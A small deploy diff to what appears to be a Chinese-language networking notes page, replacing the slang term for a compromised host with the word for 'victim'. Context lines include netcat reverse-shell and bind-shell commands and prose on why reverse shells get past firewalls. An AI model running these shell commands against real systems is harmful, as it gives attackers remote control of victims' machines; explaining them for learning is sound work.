deploy: 27ac4df10fc3788355e8ca5b956156207a3bd507

--- a/print.html
+++ b/print.html
@@ -4206,8 +4206,8 @@ nc -nv &lt;IP&gt; &lt;PORT&gt; -c bash
 <pre><code class="language-zsh"># 客户端开启一个端口，在这个端口上直接暴露自己的 shell
 nc -lp 6666 -e /bin/bash
 </code></pre>
-<p>如果用于渗透，肉鸡一般是内网环境，所以都是用的第一种，主动发送 shell 给攻击者。第二种需要攻击者能访问到肉鸡的 ip:port 才行。加上一般都有防火墙阻拦，肉鸡的入站流量可能会被防火墙拦截，但是防火墙一般不会对出站流量有限制，这也是第一种方式的用的比较多的原因。</p>
-<p>如果攻击者没有能让肉鸡访问到的 IP，一般通过内网穿透即可解决。</p>
+<p>如果用于渗透，受害者一般是内网环境，所以都是用的第一种，主动发送 shell 给攻击者。第二种需要攻击者能访问到受害者的 ip:port 才行。加上一般都有防火墙阻拦，受害者的入站流量可能会被防火墙拦截，但是防火墙一般不会对出站流量有限制，这也是第一种方式的用的比较多的原因。</p>
+<p>如果攻击者没有能让受害者访问到的 IP，一般通过内网穿透即可解决。</p>
 <h3 id="ssh-代理"><a class="header" href="#ssh-代理">SSH 代理</a></h3>
 <p>~/.ssh/config</p>
 <pre><code class="language-zsh">Host github.com
